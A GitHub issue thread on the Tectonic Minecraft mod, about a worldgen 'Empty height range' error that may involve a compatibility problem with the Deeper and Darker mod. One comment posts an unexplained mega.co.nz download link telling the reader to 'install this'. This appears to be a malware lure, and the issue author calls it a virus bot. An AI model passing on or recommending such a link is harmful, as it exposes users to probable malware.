### ISSUE TITLE
Known compatibility issue?

### ISSUE THREAD

**Issue by EliasRipley** [Apollounknowndev/tectonic#221]
Heya, sorry to post more of a query rather than an actual bug to your git, but I couldn't seem to find you on Discord or anything like that.

Please have a look at this issue I've posted to Deeper and Darker.
https://github.com/KyaniteMods/DeeperAndDarker/issues/373

I wondered if the error might have something to do with a WorldGen incompatibility due to the error: [minecraft/UniformHeight]: Empty height range: [0 above bottom--8 absolute]

Have been scrolling through our modlist to look for something that makes sense in regards to this issue.

**Comment by Anju023** [comment]
install this
https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw

you may need to install the c compiler

**Comment by EliasRipley** [comment]
> install this https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw
> 
> you may need to install the c compiler

These virus bots are getting out of hand on git.

**Comment by Apollounknowndev** [comment]
This wouldn't be a Tectonic issue.
